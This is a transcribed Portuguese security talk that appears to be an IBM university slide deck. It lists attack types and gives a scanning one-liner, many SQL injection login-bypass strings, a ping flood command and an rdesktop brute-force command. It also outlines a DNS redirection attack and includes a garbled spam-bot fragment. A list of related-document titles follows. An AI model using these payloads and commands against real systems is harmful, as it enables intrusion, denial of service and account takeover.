Elementos de Segurança da Informação em ambientes heterogêneos
|
|
- Luna de Caminha Almada
- 8 Há anos
- Visualizações:
Transcrição
1 Elementos de Segurança da Informação em ambientes heterogêneos IBM IT Specialist University Ambassador 11/02/06
2 Conceito A melhor maneira de se conhecer as armas de nosso oponente é usando-as! O feito de Alan Turing 2
3 O que são ambientes heterogêneos Repositórios de informações que podem ser acessados pelos seguintes meios: Meio físico Telefonia Rádio Rede 3
4 O que vamos caçar hoje? (As intenções de um ataque) Indisponibilizar um servidor Desfigurar uma página Desviar recursos computacionais/rede Redirecionar tráfego Roubar dados Modificar dados 4
5 Escolham suas armas Brute-force DoS Hardware Exploits Software Exploits DNS flood SQL injection Remote file inclusion Buffer overflow Engenharia social Shell code Ambientes Remoto Local 5
6 Como o campo de batalha foi formado? Guerra-Fria, Corrida Espacial e Internet Telefonia A necessidade de se computar dados em grande escala em Rede (O Unix nasce) A necessidade de se computar dados em pequena escala (O Microcomputador nasce) As Lições do IBM PC (Uma plataforma única, patenteada que se tornou um padrão livre de hardware independente de software.) As Lições da Apple (Uma plataforma única, patenteada, um conjunto inovador de hadware e software) As lições da Microsoft e o novo modelo de negócios da Micro-Computação (Vendas baseadas em licenças de uso e patentes em software) O Unix volta a cena A necessidade de se computar dados em pequena escala em Rede! O novo horizonte 6
7 O novo horizonte O surgimento do GNU (Richard Stallman) A necessidade de um kernel O surgimento da Internet (Tim Berners-Lee) O surgimento do Linux (Linus Torvalds) A Ética Hacker e o Open-Source (Eric Raymond) Catedral e Bazar A liberdade incondicional sobre a propriedade A necessidade de novas linguagems (Perl, Java, Python, PHP) *Ver timeline das linguagens 7
8 A Cultura Hacker e a Terceira Onda A liberdade incondicional sobre a propriedade O livre acesso a informação O trabalho colaborativo entre quem tem algo a agregar A estratégia Open-Source chega aos grandes players: IBM, SUN, Oracle, HP, Novell O modelo de negócios off-shore O home-office Os direitos autorais Copyright law is totally out of date. It is a Gutenberg artifact. Since it is a reactive process, it will probably have to break down completely before it is corrected. Nicholas Negroponte {Being Digital} 8
9 Rastrear Farejar e Monitorar nmap (nmap -v -ss -O /16) fping perl -e ' for (1..254) {print $_\n } ' fping -a -q 2>/dev/null nessus scanlogd ethereal ethercap cain 9
10 SQL Injection Nada mais simples que isso: SELECT fieldlist FROM table WHERE id = 23 OR 1=1 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 10
11 Remote file injection vikov.htm 11
12 Exemplo de expressão regular (?: -)*[a-za-z\d])?)\. )*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\. (?:\d+) ){3}))(?::(?:\d+))?)(?:/(?:(?:(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2})) (?:% [a-fa-f\d]{ 2})) (?:%[a-fa-f\d]{ 2})) (?:ftp://(?:(?:(?:(?:(?:[a-za- Z\d$\-_.+!*'(),] (? :%[a-fa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a- fa-f\d]{2})) - )*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(? :\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))(?:/ (?:(?:(?:(?:[a-za-z\d$\-_.+! *'(),] (?:%[a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:;type=[aidaid])?)?) (?:news:(?: (?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))) (?:[a-za-z](?:[a-za-z\d] [_.+-])*) \*)) (?:nntp://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d ])?)) (?:(?:\d+) (?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:[a-za-z](?:[a-za-z \d] [_.+-])*)(?:/(?:\d+))?) (?:telnet://(?:(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[afa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) -za- Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d] )?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))/?) (?:gopher://(?:(?: (?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?: (?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?:: (?:\d+ (?:%[a-fa-f\d]{2}))(?:(?:(?:[ (?:%[a-fa-f\d]{2}))*)(?:%09 (?:(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) \-_.+!*'(),;/?:@&=] (?:%[a-fa-f\d]{2})) *))?)?)?)?) (?:wais://(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))? )/(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)(?:(?:/(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa- F\d]{2}))*)/(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)) \?(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d] {2})) (?:mailto:(?:(?:[a-za-z\d$\-_.+!*'(),;/?:@&=] (?:% [a-fa-f\d]{2}))+)) (?:file://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3})) localhost)?/(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:% [a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:prospero://(?:(?:(?:(?:(?:[a-za-z \d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -) *[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:(?:(?: (? :[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:(?:[ a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) $\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:ldap:// (?:(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)) {3}))(?::(?:\d+))? ))?/(?:(?:(?:(?:(?:(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d]) ) (?:%20))+ (?:OID oid)\.(?:(?:\d+)(?:\. (?:\d+))*))(?:(?:%0[aa])?(?:%2 0)*)=(?:(?:%0[Aa])?(?:%20)*))?(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2}))*))(?:(?:(?:%0[aa])? (?:%20)*)\+(?:(?:%0[Aa])?(?:%20)*)(?:(?:(? :(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d])) (?:%20))+ (?:OID oid)\.(?: (?:\d+)/])+)))?)) )?) (?:nfs:(?:(?://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-a- F\d]{2}) [:@&=+])*))*)?)))... 12
13 SPAM bot public class attack { } public static void main(string[] args) { String url = " ne@none.com"; } doitagain doit = new doitagain(5,url); doit.init(); Nome: Mensagem: Submit 13
14 DoS Objetivo: Esgotar a capacidade de entrega de um servidor ping -f -s n <host> 14
15 Exemplo de Brute Force rdesktop -u Administrator -p words.txt <host> 15
16 Redirecionamento de DNS Rasterar portas Encontrar vítima (Access Point) Capturar os dados Explorar falha Mudar DNS primário Mudar os hosts internos Logar tráfego do DNS primário Analisar logs e escolher alvo 16
17 WiFi e a onda de insegurança Decriptar WEP Rastrear: Kismet Netstumbler 17
18 A versatilidade do kernel emacs gzip nano Hardware I/O Processador bash Memória gcc ncurses 18
19 Meu ambiente de testes: Seu ambiente de testes deve ser semelhante ao do seu oponente 19
20 Considerações finais Antes de tudo, seja um bom programador, Conheça bem SQL, Domine infraestrutura de redes ethernet, saiba montar e administrar seus próprios servidores Linux. 20
21 Dúvidas? 11/02/06
22 Thank You! 11/02/06
(In)Segurança Virtual. Técnicas de Ataque e Defesa
(In)Segurança Virtual Técnicas de Ataque e Defesa Expotec 2009 IFRN- Campus Mossoró Nícholas André - nicholasandreoliveira9@gmail.com www.iotecnologia.com.br Mossoró-RN Setembro-2009 O que é preciso! Engenharia
Leia maisSUMÁRIO. Cercando a instituição. 1 Perfil... 7 O que é perfil?... 8 Por que o perfil é necessário?... 9
SUMÁRIO Parte I Cercando a instituição Estudo de caso............................................. 2 ETUQDA É tudo uma questão de anonimato........................ 2 A-Tor-mentando as pessoas do bem...............................
Leia maisMartin Vincent Bloedorn. GNU/Linux
Martin Vincent Bloedorn Índice Motivação o que é? Breve história SO e abstrações GNU Origens Liberdade e escolha GNU O começo GNU GPL Free Software Foundation Desenvolvimentos Algo faltando... Linus e
Leia maisNoções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com)
Noções de Software André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) Noções de Software; Sistemas Operacionais: Evolução; Conceitos Básicos; Tipos; Exemplos. DEINFO/UFRPE
Leia maisSoftware Livre, Distribuições GNU/Linux e Telecomunicações
Álvaro Justen (a.k.a. Turicas) Apresentação Graduando em Engª de Telecomunicações - UFF Pesquisa: IF-UFF: Física computacional/estatística Midiacom: Redes sem fio Experiência > 7 anos em GNU/Linux Sócio-fundador
Leia maisCC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS
SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o
Leia mais26/09/2015. Windows Linux Mac OS/X IBM OS/2 Sun Solaris Google Android. MS-DOS Outros... O QUE É? SISTEMAS OPERACIONAIS
O QUE É? SISTEMAS OPERACIONAIS Um programa que vai gerenciar os recursos do seu computador, memória, processador, agenda de tarefas, segurança das transações, autenticação de usuários. Prof. André Aparecido
Leia maisProf. Jefferson Costa www.jeffersoncosta.com.br
O que é Linux? Open Source (software Livre) é a mesma coisa que Software Gratuito? Quem é melhor? Qual é mais seguro? Encontramos muitas diferenças entre as distribuições de Linux? Posso desinstalar o
Leia maisAmeaças, riscos e vulnerabilidades Cont. Objetivos
Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia
Leia maisA t i v i s t a s d o S o f t w a r e L i v r e
GRUPO Badio Gomes Rafael Neves Roger Luis Wilson Junior Indice Eric Raymond Bruce Perens Richard M. Stallman Linus Torvalds Ativistas brasileiros A t i v i s t a d o S o f t w a r e L i v r e Eric Raymond
Leia maisUniversidade Federal de Goiás. Alexandre Ferreira de Melo CERCOMP / UFG
Universidade Federal de Goiás Ubuntu Desktop Alexandre Ferreira de Melo CERCOMP / UFG Conpeex / 2010 Agenda Introdução Conceitos Categorias de Software História do Linux Arquitetura do Linux Ubuntu Projeto
Leia maisOficina de ferramentas de Gerência para Redes em Linux. Prof. Jefferson Santiago
Oficina de ferramentas de Gerência para Redes em Linux Prof. Jefferson Santiago Apresentação Qual seu nome? Já possui experiência na área? Questionário avaliativo Acesse: http://goo.gl/forms/4rfaomufim
Leia maisCC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS
SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o
Leia maisManifesto Software Livre
Manifesto Software Livre Histórico iniciou com a elaboração de um documento denominado: " Manifesto GNU " por Richard Stallman 1.984; marco histórico do surgimento de uma nova forma de criação de Software;
Leia maisSoftware de sistema Software aplicativo
SOFTWARE O que é Software? Software, logicial ou programa de computador é uma sequência de instruções a serem seguidas e/ou executadas, na manipulação, redireccionamento ou modificação de um dado/informação
Leia maisSISTEMA OPERACIONAL & SOFTWARE LIVRE
Curso Técnico em Redes de Computadores Disciplina de Sistemas Operacionais Livres SISTEMA OPERACIONAL & SOFTWARE LIVRE Professora: Juliana Cristina dos Santos E-mail: professora@julianacristina.com Site:
Leia maisLinux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica
Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica Semana da Informática - Escola Secundária Filipa de Vilhena 27 de Abril de 2004 - Porto Agenda Situação Actual da Utilização Linux
Leia maisSegurança em Sistemas Web. Addson A. Costa
Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.
Leia maisServiços e soluções baseadas em Software Livre. Omega Tecnologia
Serviços e soluções baseadas em Software Livre Omega Tecnologia Agenda Sobre a Omega Tecnologia As tendências da TI como Serviço Vantagens do uso de soluções livres As soluções da Omega baseadas em Software
Leia maisCriando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t
Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de
Leia maisMONITORAMENTO DO AMBIENTE TECNOLÓGICO FoccoMONITOR
MONITORAMENTO DO AMBIENTE TECNOLÓGICO FoccoMONITOR Fevereiro/2012 Índice APRESENTAÇÃO... 3 O QUE É ESSE SERVIÇO?... 3 POR QUE MONITORAR?... 3 QUAL A ABRANGÊNCIA?... 4 MÉTRICAS... 4 PERÍODO DO MONITORAMENTO...
Leia maisUNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor.
UNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor. Modelo Cliente/Servidor Por HIARLY ALVES Fortaleza - CE Apresentação. O mais famoso tipo de arquitetura utilizada em redes de computadores
Leia maisModo Básico, passando por senhas em sites
A Injeção SQL www.invasao.com.br Modo Básico, passando por senhas em sites Hoje em dia é uma prática comum os sites pedirem um cadastro do visitante, e criar-lhe um login, dando acesso a áreas restritas
Leia maisCriando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t
Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de
Leia maisSistema Operacional. História Sistema Operacional 1. QI Escolas e Faculdades Apostila de Linux
4 Capítulo 1 Sistema Operacional É uma coleção de programas que inicializa hardwares, fornece rotinas básicas para controle de dispositivos, mantém a integridade de um sistema. Um sistema operacional de
Leia maisUnidade 1: Sistema Operativo Linux
Unidade 1: Sistema Operativo Linux 1 2 Sistema Operativo Linux Objectivos desta unidade Caracterizar o sistema operativo Linux Saber como obter documentação e apoio sobre a instalação e utilização do Linux
Leia maisSegredos do Hacker Ético
Marcos Flávio Araújo Assunção Segredos do Hacker Ético 2 a Edição Visual Books Sumário Prefácio... 21 Introdução... 23 1 Entendendo o Assunto... 25 1.1 Bem-vindo ao Obscuro Mundo da Segurança Digital...25
Leia maisGR1NCH/Rêner (gr1nch@dclabs.com)
GR1NCH/Rêner (gr1nch@dclabs.com) Agenda O que seria um ataque de SQL Injection. As falhas de um administrador. O código ASP vulnerável. O ponto de vista do invasor e as etapas de um ataque: Levantamento
Leia maisAgente local Aranda GNU/Linux. [Manual Instalación] Todos los derechos reservados Aranda Software www.arandasoft.com [1]
Todos los derechos reservados Aranda Software www.arandasoft.com [1] Introdução O Agente Aranda para sistemas Linux se encarrega de coletar as seguintes informações em cada uma das estações de trabalho
Leia maisSOFTWARE LIVRE. Fábio Rodrigo Barby Informática - IFPR
SOFTWARE LIVRE Fábio Rodrigo Barby Informática - IFPR Software Livre x Software Proprietário Software Proprietário O que é? Copyright; Cópia é proibida; Redistribuição é proibida; Modificação é proibida;
Leia maisO modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre.
O modelo Bazar de Produção de Softwares O caso das Comunidades Virtuais de Software livre. Por Vicente Aguiar Fonte: Lucas Rocha Feced/2005 Sobre esta apresentação 2005 Lucas Rocha > lucasr@gnome.org
Leia maisLinux em Portugal Visão Caixa Mágica
Linux em Portugal Visão Caixa Mágica Paulo Trezentos Paulo.Trezentos@caixamagica.pt - Investigador ADETTI - Responsável Caixa Mágica Visão... Visão Inovação Questão? 2 Empresas GrupoPT Indústria Telco
Leia maisSistemas Distribuídos
Sistemas Distribuídos LICENCIATURA EM COMPUTAÇÃO Prof. Adriano Avelar Site: www.adrianoavelar.com Email: eam.avelar@gmail.com Relembrando... Mecanismos de Comunicação Middleware Cenário em uma rede Local
Leia maisApresentação. Objetivo. Dados Principais. Tecnologia Abordada Linux
Apresentação Dados Principais Objetivo Este curso fornecerá o conhecimento técnico e administrativo necessário ao desenvolvimento, administração e manutenção de estações e servidores baseados na plataforma
Leia maisSoftware Livre em Empresas. Cesar Bezerra Teixeira
Software Livre em Empresas Cesar Bezerra Teixeira 2004 Objetivo Apresentar tópicos diversos, para implantação de uma política de utilização de software livre, em empresas. Cesar Bezerra Teixeira 2 Sumário
Leia maisSenha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização
Manual do Nscontrol Principal Senha Admin Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Aqui, você poderá selecionar quais programas você quer que
Leia maisSegurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com
UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel
Leia maisSistema Operativo Linux
Sistema Operativo Linux Linux É um sistema operativo da família UNIX, desenvolvido colaborativamente através da internet. É um software livre ou open source, com o código fonte disponível em www.kernel.org
Leia maisDesenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t
Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de Programação:
Leia maisInstruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM
Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM Índice Instruções de Instalação....... 1 Requisitos do sistema........... 1 Código de autorização.......... 1 Instalando...............
Leia maisAcesso a banco de dados
Acesso a banco de dados 1. Crie uma pasta chamada AcessoBD com as seguintes subpastas: Aplicativos, Drivers, AcessoMSACCESS, AcessoMySQL e AcessoSQLSERVER Exemplo 1: MS ACCESS 1. Crie um banco de dados
Leia maisO modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre.
O modelo Bazar de Produção de Softwares O caso das Comunidades Virtuais de Software livre. Por Vicente Aguiar Fonte: Lucas Rocha Feced/2005 Sobre esta apresentação 2008 Vicente Aguiar
Leia maisGenerated by Foxit PDF Creator Foxit Software http://www.foxitsoftware.com For evaluation only. Capitulo 1
Capitulo 1 Montagem de duas pequenas redes com a mesma estrutura. Uma é comandada por um servidor Windows e outra por um servidor linux, os computadores clientes têm o Windows xp Professional instalados.
Leia maisCoordenação de Segurança cooseg@celepar.pr.gov.br. 1 de 37
Implementando Segurança em Software Livre Coordenação de Segurança cooseg@celepar.pr.gov.br 1 de 37 Internet Incidente de Segurança Ataques Ameaças Vulnerabilidades Riscos Estatísticas Agenda Políticas
Leia maisO Windows é um software de sistema, que permite ao utilizador interagir com o computador e com os seus periféricos.
Sistema Operativo Windows - Ambiente de trabalho - Janelas - Atalhos - Programas - Gestão de pastas e ficheiros - Menu iniciar O Windows é um software de sistema, que permite ao utilizador interagir com
Leia mais1 / 6. Cartilha O ABC do Software Livre. O que é PcLivre?
1 / 6 Cartilha O ABC do Software Livre O que é PcLivre? O PC Livre é um projeto de iniciativa do PSL-Brasil, coordenado por voluntários e operado por vários parceiros que apoiam a iniciação de novos usuários
Leia maisICC - Aula 15 Sistemas Operacionais e Redes
February 2, 2015 O Sistema Operacional é o software basico que controla um computador É o primeiro software 1 a ser executado pelo computador e o ultimo (shutdown) Funcionalidades e desempenho 1 Na realidade,
Leia maisSegurança em Aplicações Web Metodologia OWASP
Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário
Leia maisLaboratório de Banco de Dados Aula 1 Acesso a Banco de Dados. Prof. Josenildo Silva jcsilva@ifma.edu.br
Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores
Leia maisUso de Software Livre na Universidade
Uso de Software Livre na Universidade Diego Starling Fonseca Guilherme da Silva Nascimento Gustavo Henrique do Nascimento Pereira Luiz Henrique Bueno Byrro Marcelo Luiz Lacerda Esteves Rodrigo Alvaro da
Leia maisGerência de Redes de Computadores. 05 Gerência de Hospedeiros (Hosts)
Gerência de Redes de Computadores 05 Gerência de Hospedeiros (Hosts) UFCG / DSC / JPS * 05 GERÊNCIA DE HOSPEDEIROS 1 TIPOS DE HOSPEDEIROS DOIS TIPOS DE HOSPEDEIROS o Servidores o Estações Clientes HÁ GRANDE
Leia maisJDBC DRIVER. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC.
Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC. Requisitos para usar o driver JDBC Do lado do cliente: O driver JDBC Do lado do servidor: A base
Leia maisINTERNET. George Gomes Cabral
INTERNET George Gomes Cabral HISTÓRICO 1966 Um pesquisador da Agência de Projetos Avançados de Pesquisa (Arpa) chamado Bob Taylor consegue US$ 1 milhão para tocar um projeto de interligação dos laboratórios
Leia maisFerramentas de Administração. PostgreSQL
Ferramentas de Administração ao SGBD PostgreSQL Diego Rivera Tavares de Araújo diegoriverata@gmail.com Introdução Mas o que é PostgreSQL? Introdução as ferramentas O PostgreSQL pode ser acessado a partir
Leia maisOpen - audit Ferramenta para gerenc iamento de rede
Faculdade de Tecnologia SENAC GO Ges t ã o de T ecnologia de Informaç ão M ód ulo IV - Matutin o Open - audit Ferramenta para gerenc iamento de rede Alunos : Gab riel da Silva, Matheus Pereira, Rome ro
Leia maisAula 1 Acesso a Banco de Dados
Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores
Leia maisInstalando o WordPress em localhost
Instalando o WordPress em localhost WordPress sem Mistério LEE ARAUJO htto://wordpresssemmisterio.com.br Sumário Instalando o WordPress em Localhost... 2 O Servidor web... 3 Iniciando o servidor... 6 Criação
Leia maisIntrodução Software Livre Projeto GNU/Linux Software Livre vs Software Proprietário Liberdade para todos. Software Livre. Grupo 5
Introdução Projeto GNU/Linux vs Software Proprietário Liberdade para todos Tronco Inicial Universidade Federal de Alagoas - UFAL- Arapiraca 29 de Março 2012 Introdução Projeto GNU/Linux vs Software Proprietário
Leia maishttp://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho
vi http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Administração de Redes de Computadores Resumo de Serviços em Rede Linux Controlador de Domínio Servidor DNS
Leia maisData Transformation Services (DTS) por Anderson Ferreira Souza
Data Transformation Services (DTS) por Anderson Ferreira Souza O Sql Server possui um recurso extremamente poderoso que é muito pouco utilizado pelos administradores e programadores. Com certeza, sendo
Leia maisProgramação de Computadores e Robocode. http://www.lac.inpe.br/~rafael.santos
Programação de Computadores e Robocode 1 O que é Programação de Computadores? O que é um programa de computador? Quem escreve estes programas? Como são escritos? O que podemos fazer com estes programas?
Leia maisM O D E L O E U R O P E U D E C U R R I C U L U M V I T A E
M O D E L O E U R O P E U D E C U R R I C U L U M V I T A E INFORMAÇÃO PESSOAL Nome TRINDADE, António Miguel Ferreira Marques Morada Rua Adelino Amaro da Costa, 9, 4.º ESQ., 2720-002 Amadora Telefone +351
Leia maisEsse documento está licenciado pela licença Creative Commons Atribuição-Uso Não-Comercial-Compatilhamento pela mesma licença 3.0.
Esse documento está licenciado pela licença Creative Commons Atribuição-Uso Não-Comercial-Compatilhamento pela mesma licença 3.0. Para saber o que você pode fazer ou não com este arquivo, leia este link
Leia maisBacharelado em Ciência e Tecnologia Processamento da Informação. Equivalência Portugol Java. Linguagem Java
Linguagem Java Objetivos Compreender como desenvolver algoritmos básicos em JAVA Aprender como escrever programas na Linguagem JAVA baseando-se na Linguagem Portugol aprender as sintaxes equivalentes entre
Leia maisGBD. Introdução PROF. ANDREZA S. AREÃO
GBD Introdução PROF. ANDREZA S. AREÃO Sistema de arquivos X Sistemas de Banco de Dados Sistema de arquivos Sistema de Banco de Dados Aplicativos Dados (arquivos) Aplicativos SGBD Dados (arquivos) O acesso/gerenciamento
Leia maisPassos Preliminares: Acessando a máquina virtual via ssh.
CIn/UFPE Sistemas de Informação Redes de Computadores Professor: Kelvin Lopes Dias Monitor: Edson Adriano Maravalho Avelar {kld,eama}@cin.ufpe.br Instalando/Configurando Servidor DNS. Este tutorial irá
Leia maisO B J E T T I I V V O O S
O B J E T I V O S - Conhecer as características e possibilidades do SO Linux, como workstation simples ou elemento componente de uma rede; - Adquirir noções sobre as atuais exigências de segurança eletrônica
Leia maisBD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04
BD SQL Server SGBD SQL Server Licenciatura em Engenharia Informática e Computação Bases de Dados 2003/04 BD SQL Server Criação da Ligação ao SGBD Entrar no Microsoft SQL Server / Enterprise Manager Criar
Leia maisProfessor: Douglas Sousa Cursos de Computação
Linguagem de Programação C# Professor: Douglas Sousa Cursos de Computação Agenda Conceitos Básicos; Principais Características; Visual Studio; Meu Primeiro Programa; A Linguagem C#; Sistemas de Tipos;
Leia maisMANDRIVA CONECTIVA LINUX - ADMINISTRAÇÃO DE SISTEMAS E REDES
www.lanuniversity.com.br MANDRIVA CONECTIVA LINUX - ADMINISTRAÇÃO DE SISTEMAS E REDES Preparatório para certificações Mandriva Systems Administrator, Mandriva Network Administrator, e exames do LPI Nível
Leia maisda mão-de-obra de TI da América Latina está no Brasil (considerado o maior empregador do setor) seguido pelo México com 23%.
Informações de Tecnologia A tecnologia virou ferramenta indispensável para as pessoas trabalharem, se comunicarem e até se divertirem. Computação é a área que mais cresce no mundo inteiro! Esse constante
Leia maisATENÇÃO: Este post é atualizado toda vez que alguma função é inserida ou removida da ferramenta.
Cangibrina Dashboard Finder 11 DE SETEMBRO DE 2015 ATENÇÃO: Este post é atualizado toda vez que alguma função é inserida ou removida da ferramenta. Hoje trarei uma ferramenta desenvolvida por mim mesmo
Leia maisCurso Introdução ao Linux. Desmistificando o Software Livre. Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com.
Curso Introdução ao Linux Desmistificando o Software Livre Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com.br Índice 1 O que é Software Livre? 2 A história por trás do Software Livre.
Leia maisBANCO DE DADOS II. AULA MySQL.
